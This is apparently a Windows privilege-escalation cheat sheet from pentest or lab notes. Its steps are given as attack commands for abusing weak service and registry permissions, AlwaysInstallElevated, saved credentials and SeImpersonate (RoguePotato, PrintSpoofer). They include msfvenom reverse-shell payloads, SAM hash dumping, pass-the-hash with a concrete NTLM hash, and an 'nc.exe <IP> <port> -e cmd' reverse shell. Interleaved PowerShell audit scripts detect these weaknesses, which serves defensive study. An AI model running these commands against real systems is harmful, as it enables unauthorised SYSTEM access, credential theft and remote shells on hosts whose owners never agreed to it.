# Windows

**- Registry**\
HKLM (HKEY_LOCAL_MACHINE) holds machine-wide settings that apply to all users; HKCU (HKEY_CURRENT_USER) holds the settings of the user currently logged on.\
\
**- Check security groups of current user**

```
# Groups of the current token (privileges: whoami /priv)
whoami /groups
# Local account details, including local group memberships
net user <username>
```

**1. Insecure Service Permissions**

```
# Check whether the current user can change the service configuration (SERVICE_CHANGE_CONFIG)
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user <service=daclsvc>
# Show the current configuration; a service that runs as LocalSystem gives elevated privileges
sc qc <service=daclsvc>
# 'SERVICE_START_NAME : LocalSystem'
# Note the space after "binpath=" (required by sc.exe syntax)
sc config <service=daclsvc> binpath= "<path-to-reverse-shell>"
sc start <service=daclsvc>
```

\
**2. Unquoted Service Path**

```
# Look for a BINARY_PATH_NAME that contains spaces but no surrounding quotes
sc qc unquotedsvc
# Check which directories along the path are writable by the current user
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"
copy reverse.exe "C:\Program Files\Unquoted Path Service\Common"
sc start unquotedsvc
```

\
**3. Weak Registry Permissions**\
\
NT AUTHORITY\INTERACTIVE = every interactively logged-in user, so write access granted to it is effectively granted to all local users\
\
REG\_EXPAND\_SZ : An expandable data string; references such as %SystemRoot% are expanded when the value is read.\
\
REG\_SZ : This data type has a fixed length; environment variable references in it are not expanded.

```
sc qc regsvc
# Check the ACL of the service's registry key; KEY_SET_VALUE or KEY_ALL_ACCESS for a low-privileged group is the weakness
accesschk.exe -k <registry-entry-for-service>
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
# Repoint ImagePath; /f overwrites the existing value without prompting
reg add <registry-entry-for-service> /v ImagePath /t REG_EXPAND_SZ /d <path-to-rshell> /f
```

\
**4. Insecure Service Executables**

```
sc qc <service>
# Check the ACL of the binary the service runs
accesschk.exe /accepteula -uwqv <path-to-service.exe>
# output - RW Everyone (any user can overwrite the binary)
# Replace the service executable with the reverse shell generated
```
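
The following PowerShell is an added audit example, not part of this cheat sheet or of any tool it names. It enumerates every service and flags the three weaknesses from sections 2 to 4 (unquoted binary path with spaces, service binary writable by low-privileged principals, service registry key writable by them) so they can be fixed before anyone abuses them. The list of "low-privileged" principals and the write-rights masks are this example's own assumptions; it runs from an ordinary, non-elevated prompt on the host being assessed.

```powershell
# Added audit example: find services with the weaknesses described in sections 2-4.
# Not part of the cheat sheet or of any tool it names; reads configuration and ACLs only.

# Principals treated as "low privileged" for this audit (assumption; extend as needed)
$LowPrivPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME"
)
# Rights that let a principal replace a binary or repoint a service key.
# 0x40000000 / 0x10000000 are GENERIC_WRITE / GENERIC_ALL, which show up in some inherited ACEs.
$FileWriteMask = [int]([System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership') -bor 0x40000000 -bor 0x10000000
$RegWriteMask  = [int]([System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership') -bor 0x40000000 -bor 0x10000000

function Get-WeakWriteAces {
    # Emit "principal : rights" for every Allow ACE that grants a low-privileged principal
    # any bit of $Mask. $RightsProperty is 'FileSystemRights' or 'RegistryRights'.
    param($Acl, [string]$RightsProperty, [int]$Mask)
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($LowPrivPrincipals -notcontains $who) { continue }
        if (([int]$ace.$RightsProperty -band $Mask) -ne 0) { "$who : $($ace.$RightsProperty)" }
    }
}

function Get-ServiceBinaryPath {
    # Extract the executable from a service PathName, with or without quotes or arguments
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Find-WeakServiceConfig {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe) { continue }
        $issues = @()

        # Section 2: unquoted path with spaces. The service controller tries
        # "C:\Program.exe", "C:\Program Files\Unquoted.exe", ... before the real binary.
        if ($svc.PathName -notlike '"*' -and $exe -match ' ') { $issues += 'UnquotedPath' }

        # Section 4: binary writable by a low-privileged principal
        if (Test-Path -LiteralPath $exe) {
            try {
                $weak = @(Get-WeakWriteAces (Get-Acl -LiteralPath $exe -ErrorAction Stop) 'FileSystemRights' $FileWriteMask)
                if ($weak.Count) { $issues += "WritableBinary[$($weak -join '; ')]" }
            } catch { }
        }

        # Section 3: service key writable, so ImagePath can be repointed
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        if (Test-Path -LiteralPath $key) {
            try {
                $weak = @(Get-WeakWriteAces (Get-Acl -LiteralPath $key -ErrorAction Stop) 'RegistryRights' $RegWriteMask)
                if ($weak.Count) { $issues += "WritableRegKey[$($weak -join '; ')]" }
            } catch { }
        }

        if ($issues.Count) {
            [pscustomobject]@{
                Service = $svc.Name
                RunsAs  = $svc.StartName
                Binary  = $exe
                Issues  = $issues -join ', '
            }
        }
    }
}

# Remediation for each finding: quote the path, e.g.
#   sc.exe config <name> binPath= "\"C:\Program Files\Vendor\svc.exe\" <args>"
# tighten the file or key ACL so only Administrators and SYSTEM can write, or run the
# service under a less privileged account so that a rewrite no longer yields SYSTEM.
Find-WeakServiceConfig | Format-Table -AutoSize
```

A service that appears with `RunsAs = LocalSystem` and any issue is the case the sections above exploit; services running as a dedicated low-privileged account are lower priority, but the ACL should still be fixed.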

\
**5. Registry Autoruns**\
\[Todo]

**6. Registry AlwaysInstallElevated**\
Windows Installer runs any MSI package with SYSTEM privileges when the AlwaysInstallElevated value is set to "1" (REG_DWORD 0x1) under both of the following registry keys:\
`HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer`\
`HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer`

```
# Check the keys (both must report AlwaysInstallElevated REG_DWORD 0x1)
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

# Payload generation (MSI package format)
msfvenom -p <payload> LHOST=<IP> LPORT=<port> -f msi -o reverse.msi
# Install the package without UI: /i = install, /quiet /qn = no prompts
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
```

\
**7. Passwords in Registry**

```
# Search all of HKLM for keys and values whose name or data contain "password"
reg query HKLM /f password /s
# Autologon stores the password in plaintext; this is how the value is added
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /d testing123 /t REG_SZ

# DefaultUsername and DefaultPassword values for autologon live under
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

# PowerShell: list the subkeys under a registry path (Get-ItemProperty reads the values)
Get-ChildItem -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\'
```
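
As an added audit example for sections 6 and 7 (not part of this cheat sheet), the PowerShell below reads the Installer policy keys and the Winlogon key and reports whether the dangerous state is present, without echoing any password. The function names and the report layout are this example's own; the registry paths and value names are the ones the sections above use.

```powershell
# Added audit example: report the registry misconfigurations from sections 6 and 7.
# Not part of the cheat sheet; reads the keys only and builds or runs nothing.

function Test-AlwaysInstallElevated {
    # Windows Installer runs any MSI as SYSTEM only when BOTH values are 1 (section 6).
    $keys = @(
        'HKCU:\Software\Policies\Microsoft\Windows\Installer',
        'HKLM:\Software\Policies\Microsoft\Windows\Installer'
    )
    $states = foreach ($k in $keys) {
        # Missing key or missing value both count as "not set"
        $item = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [pscustomobject]@{ Key = $k; Value = $item.AlwaysInstallElevated }
    }
    $enabledCount = @($states | Where-Object { $_.Value -eq 1 }).Count
    [pscustomobject]@{
        Check      = 'AlwaysInstallElevated'
        Vulnerable = ($enabledCount -eq 2)
        Detail     = ($states | ForEach-Object { "$($_.Key) = $($_.Value)" }) -join '; '
        # Fix: Set-ItemProperty -Path <key> -Name AlwaysInstallElevated -Value 0 on both keys
        # (or remove the policy via Group Policy so the value is absent).
    }
}

function Test-AutoLogonPassword {
    # Section 7: autologon keeps DefaultPassword in plaintext under the Winlogon key.
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
    $hasPassword = -not [string]::IsNullOrEmpty($p.DefaultPassword)
    if ($hasPassword) {
        # Report that a password is present without writing it into the audit output
        $detail = "AutoAdminLogon=$($p.AutoAdminLogon) DefaultUserName=$($p.DefaultUserName) DefaultPassword=<present, not shown>"
    } else {
        $detail = 'no DefaultPassword value'
    }
    [pscustomobject]@{
        Check      = 'WinlogonDefaultPassword'
        Vulnerable = $hasPassword
        Detail     = $detail
        # Fix: Remove-ItemProperty -Path $winlogon -Name DefaultPassword; if autologon is
        # required, configure it through LSA secrets (Sysinternals Autologon) instead.
    }
}

@(Test-AlwaysInstallElevated; Test-AutoLogonPassword) | Format-Table -AutoSize
```

Both checks read keys that any local user can query, so the script doubles as a quick pre-flight on a freshly built image.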

\
**8. Retrieve password from SAM SYSTEM registry hives**\
\- The SAM hive cannot be read directly while Windows is running; even reg query is refused:\
`reg query HKLM\SAM\SAM`\
ERROR: Access is denied.

```
# Dump the hashes offline from copies of the SYSTEM and SAM hive files
python3 creddump7/pwdump.py SYSTEM SAM
# Crack the resulting NTLM hashes
```

\
**9. Saved credentials from a previous user \[run the executable from a folder that belongs to the admin/higher-privileged user]**

```
# List credentials saved with cmdkey / Credential Manager
cmdkey /list

# Run an executable as another user with the saved credential
runas /savecred /user:<domain\user> <path-to-exec>
```

\
**10. Pass the Hash (pth)**

```
# Pass-the-hash over SMB with impacket (pth-winexe also works over SMB)
psexec.py admin@10.10.92.1 -hashes aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da

# xfreerdp with pass-the-hash: pass only the NT part of LM:NT (the LM part is empty when no LM hash is stored)
# RDP pass-the-hash only works when Restricted Admin mode is enabled on the target
xfreerdp +clipboard /u:admin /pth:a9fdfa038c4b75ebc76dc855dd74f0da /cert:ignore /v:10.10.92.1
```

\
**11. Task running every few intervals**\
If a scheduled task runs a PowerShell script that the current user can write to, append "path-to-exec" at the end of the script; it runs with the task's privileges on the next trigger\
\
**12. Insecure GUI Apps**\
In a GUI app running with higher privileges: File > Open > navigation pane > C:\Windows\System32\cmd.exe (the spawned process inherits the app's privileges)\
\
**13. Startup Apps \[createshortcut.vbs]**\
Add a shortcut to the reverse executable in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"; everything in that folder runs when any user, including an administrator, logs on
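
For sections 11 and 13 the defender's question is which autostart locations a low-privileged user can modify. The PowerShell below is an added audit example (not from this cheat sheet) that checks the all-users StartUp folder and the executables and scripts behind every enabled scheduled task for write access by low-privileged principals. The principal list, the rights mask and the script-extension pattern are this example's own assumptions.

```powershell
# Added audit example for sections 11 and 13: autostart locations writable by low-privileged
# users. Not part of the cheat sheet; it reads ACLs and task definitions only.

# Principals treated as "low privileged" (assumption; extend as needed)
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME")
# Write-class rights plus the GENERIC_WRITE / GENERIC_ALL bits seen in inherited ACEs
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership') -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWritable {
    # True when an Allow ACE on $Path grants a low-privileged principal a write-class right
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    return [bool]($acl.Access | Where-Object { $_.AccessControlType -eq 'Allow' -and
        $LowPrivPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band $WriteMask) -ne 0) })
}

function Find-WritableAutostarts {
    # Section 13: the all-users Startup folder runs everything in it at each interactive logon
    $startup = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp'
    if (Test-LowPrivWritable $startup) {
        [pscustomobject]@{ Source = 'StartupFolder'; Target = $startup; RunsAs = 'each user at logon' }
    }

    # Section 11: scheduled tasks whose action, or the script it launches, is writable
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object State -ne 'Disabled') {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $targets = @([Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"')))
            # powershell.exe / cmd.exe / wscript.exe: the interesting file is the script in the arguments
            if ($action.Arguments -match '([A-Za-z]:\\[^"\s]+\.(ps1|bat|cmd|vbs|js))') {
                $targets += [Environment]::ExpandEnvironmentVariables($Matches[1])
            }
            foreach ($t in $targets) {
                if ((Test-Path -LiteralPath $t) -and (Test-LowPrivWritable $t)) {
                    [pscustomobject]@{
                        Source = "Task:$($task.TaskPath)$($task.TaskName)"
                        Target = $t
                        RunsAs = "$($task.Principal.UserId) ($($task.Principal.RunLevel))"
                    }
                }
            }
        }
    }
}

# Remediation: restrict the flagged file or folder so only Administrators and SYSTEM can
# modify it (icacls), or move task scripts into a protected directory such as
# C:\Program Files and point the task there.
Find-WritableAutostarts | Format-Table -AutoSize
```

A non-elevated run only sees tasks the user is allowed to read, so repeat the audit from an administrative prompt to cover tasks that run as SYSTEM with hidden definitions.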
\
**14. RoguePotato Attack**

{% embed url="<https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Cocomazzi-The-Rise-of-Potatoes-Privilege-Escalations-in-Windows-Services.pdf>" %}

• You need a compromised account on the victim machine with impersonation privileges (SeImpersonatePrivilege), which service accounts such as "nt authority\local service" hold by default

```
# s0 - confirm the privilege is present
whoami /priv
# [SeImpersonatePrivilege is Enabled]

# s1 - on the attacker machine, forward incoming port 135 to the target's listener on 9999
sudo socat TCP-LISTEN:135,reuseaddr,fork TCP:<IP of target>:9999
# s2 - listener for the reverse executable
nc -nlvp <port-used-in-reverse-exec>

# s3 - on the target, when running as "nt authority\local service"
RoguePotato.exe -r <IP of attacker> -e "<path-to-exec>" -l 9999

# run as a local service "nt authority\local service"
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\cmd.exe"
# -or-
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
```

**15. PrintSpoofer**

```
PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
```
\
**- Tools**\
winPEASany.exe\
seatbelt.exe all full\
sharp.exe audit\
JAWS \[works in the presence of AV solutions]

\
**- Powerup**

```
# Load PowerUp from the current directory (dot-sourcing also works: . .\PowerUp.ps1)
Import-Module .\PowerUp.ps1
# Run every check PowerUp knows
Invoke-AllChecks
# Only services with unquoted binary paths
Get-ServiceUnquoted
```

\
**- List of Exploitable Privileges**

{% embed url="<https://github.com/gtworek/Priv2Admin>" %}

**- SeImpersonate**

```
# PrintSpoofer32.exe needs an executable to launch (a PowerShell script cannot be passed directly)
.\PrintSpoofer32.exe -c 'nc.exe <IP> <port> -e cmd'
```
